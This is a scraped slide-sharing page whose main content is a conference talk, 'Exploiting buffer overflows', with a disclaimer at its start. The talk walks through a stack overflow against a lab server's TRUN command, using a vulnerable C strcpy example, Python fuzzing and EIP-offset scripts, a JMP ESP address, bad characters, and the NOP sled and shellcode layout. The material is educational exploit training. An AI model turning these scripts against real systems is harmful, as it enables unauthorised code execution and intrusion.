Logicalis Security Conference
Logicalis Security ConferenceLogicalis Security Conference
Logicalis Security Conference
 
Letter anonymous-II
Letter anonymous-IILetter anonymous-II
Letter anonymous-II
 
Practical Cyber Defense
Practical Cyber DefensePractical Cyber Defense
Practical Cyber Defense
 
A Letter from Anonymous to the Jersey Finance Industry
A Letter from Anonymous to the Jersey Finance IndustryA Letter from Anonymous to the Jersey Finance Industry
A Letter from Anonymous to the Jersey Finance Industry
 
Infosec lecture-final
Infosec lecture-finalInfosec lecture-final
Infosec lecture-final
 
Path to Surfdroid
Path to SurfdroidPath to Surfdroid
Path to Surfdroid
 
WI-FI Security in Jersey 2011
WI-FI Security in Jersey 2011WI-FI Security in Jersey 2011
WI-FI Security in Jersey 2011
 

Recently uploaded

How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Chart Kalyan
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
Postman
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying AheadDigital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Wask
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Alex Pruden
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Precisely
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE VisionWhat is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
DianaGray10
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
Data Hops
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 

Recently uploaded (20)

How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying AheadDigital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying Ahead
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE VisionWhat is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 

Exploiting buffer overflows

  • 1.
  • 2. Disclaimer @cyberkryption The views expressed within this presentation or afterwards are my own and in no way represent my employer. The following presentation describes how to conduct a buffer overflow attack. These attacks are illegal to perform against systems that you do not have explicit permission to test. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Caveat: With knowledge comes responsibility
  • 5. Von Neuman Explained.. Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec
  • 7. Meet the Stack Each program has it's own stack as a memory structure. Program data such as variable are also saved Data is 'pushed' on to the stack and 'popped' off the stack https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  • 8. A Vulnerable 'C' program #include<stdio.h> int main(int argc, char *argv[]) { char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0; } We defined a character of size 20 bytes, it reserves some space on the stack We copy the buffer using string copy without checking it's size If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!
  • 9. Stack Overwrite Data on the stack is overwritten. Extra input overwrites other data in the stack Eventually the instruction pointer is overwritten and we have control!!! https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  • 10. Meet the CPU Registers & Pointers CPU Pointers EIP = Points to the next address in memory to be executed ESP = Stack Pointer. EBP = Stack Pointer Base Pointer If we can overwrite EIP we can control execution flow other wise it's a DOS exploit. CPU Registers EAX Accumulator EBX Base Register ECX Counter Register EDX Data Register
  • 12. Initial Fuzzing #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
  • 15. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer ???????? ???????? ????????
  • 16. EIP Hunting #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = " < insert cyclic pattern here> " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
  • 17. EIP Hunting – Cyclic Pattern Crash
  • 18. How to Locate EIP Overwrite ● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register ● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters. ● Lastly use pattern offset to find EIP overwrite ● Use convert.sh for HEX to ASCII conversion
  • 20. EIP Hunting Part II #!/usr/bin/python import socket server = '192.168.1.65' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
  • 21. EIP & Buffer Space Confirmed Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes
  • 22. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction ???????? ????????
  • 23. Determining JMP ESP Memory Location
  • 24. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll ????????
  • 25. The Bad Character Problem Hex Dec Description --- --- --------------------------------------------- 0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!
  • 28. Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll 0x00
  • 29. Lets Create some Shellcode
  • 30. Final Buffer Structure & Operation 625011AF EIP Overwite'A' * 2006 ShellcodeNOP Sled JMP ESP Buffer Overflow starts here Execution to 625011AF JMP ESP in 625011AF redirects to NOP SLED Shellcode Runs xCC Breakpoint Breakpoint Activated
  • 31. Putting it all together
  • 34. Questions ???? TWITTER: @cyberkryption BLOG: cyberkryption.wordpress.com